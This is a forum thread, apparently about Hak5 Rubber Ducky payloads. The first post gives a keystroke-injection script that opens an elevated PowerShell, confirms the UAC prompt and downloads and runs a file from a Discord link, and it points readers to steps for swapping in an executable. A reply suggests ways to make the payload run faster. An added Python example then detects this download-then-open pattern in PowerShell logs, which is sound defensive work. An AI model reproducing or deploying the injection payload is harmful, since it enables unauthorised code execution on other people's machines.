4ery
Posted September 24, 2023

Alright, here's the script:

REM start of script
REM
REM let the HID enumerate
DELAY 2000
GUI r
DELAY 200
REM my best attempt at an elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 3000
STRING $down = New-Object System.Net.Webclient; $url = 'https://cdn.discordapp.com/attachments/1154635152610299964/1155258532598382744/rick.mp4'; $file = 'rick.mp4'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
ENTER

Go on my GitHub (https://github.com/4ery/Ducky-Execute) for steps on how to edit it and make it download and run an exe.

dark_pyrro
Posted September 25, 2023

You can submit it to the Hak5 GitHub repo, there are similar ones there already though in different categories. You could also slim it down a bit since using the 2nd gen Ducky and get rid of some ENTER lines if using STRINGLN instead of STRING + ENTER. Also possible to try the DETECT_READY extension instead of the initial DELAY to make payload execution faster (in many cases) and also not risk having a DELAY set that might be too short.
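
From the defender's side, the PowerShell line typed by the payload in the first post is a download followed by opening the same file. The following is an added example, not code from either poster or from Hak5: it flags that pairing in PowerShell script block logging records (event ID 4104). It assumes script block logging is enabled and that records arrive as dicts with EventID and ScriptBlockText keys; the function names, sample records and placeholder URL are constructed for illustration.

```python
import re

ASSIGN = re.compile(r"^\$(\w+)\s*=\s*(['\"])(.*?)\2$")  # $name = 'literal'
DOWNLOAD = re.compile(r"\.DownloadFile\(\s*(.+?)\s*,\s*(.+?)\s*\)$", re.I)
EXECUTE = re.compile(r"\.ShellExecute\(\s*(.+?)\s*\)$", re.I)

def resolve(token, variables):
    """Turn a $variable or quoted literal into its string value, if known."""
    token = token.strip()
    if token.startswith("$"):
        return variables.get(token[1:].lower())
    return token.strip("'\"")

def download_then_open(script_block):
    """Return (url, path) when a file fetched with DownloadFile is later passed to ShellExecute."""
    variables, downloaded = {}, {}
    # Naive statement split: a ';' inside a quoted string would break it (known limitation).
    for stmt in (s.strip() for s in script_block.split(";")):
        m = ASSIGN.match(stmt)
        if m:
            variables[m.group(1).lower()] = m.group(3)
            continue
        m = DOWNLOAD.search(stmt)
        if m:
            url, path = resolve(m.group(1), variables), resolve(m.group(2), variables)
            if url and path:
                downloaded[path.lower()] = url
            continue
        m = EXECUTE.search(stmt)
        if m:
            path = resolve(m.group(1), variables)
            if path and path.lower() in downloaded:
                return downloaded[path.lower()], path
    return None

# Constructed sample records (not real logs); the URLs are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "$down = New-Object System.Net.Webclient; $url = 'https://files.example.test/clip.mp4'; $file = 'clip.mp4'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"},
    {"EventID": 4104, "ScriptBlockText": "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://files.example.test/report.csv','report.csv')"},
    {"EventID": 4104, "ScriptBlockText": "$sh = New-Object -com shell.application; $sh.ShellExecute('notes.txt')"},
]

def scan(events):
    """Return (url, path) for every 4104 record that downloads a file and then opens it."""
    hits = [download_then_open(e["ScriptBlockText"]) for e in events if e.get("EventID") == 4104]
    return [h for h in hits if h]

if __name__ == "__main__":
    for url, path in scan(SAMPLE_EVENTS):
        print(f"download-then-open: {path} <- {url}")
```

Only the first sample record is reported: the second downloads without opening, and the third opens a file that was never downloaded.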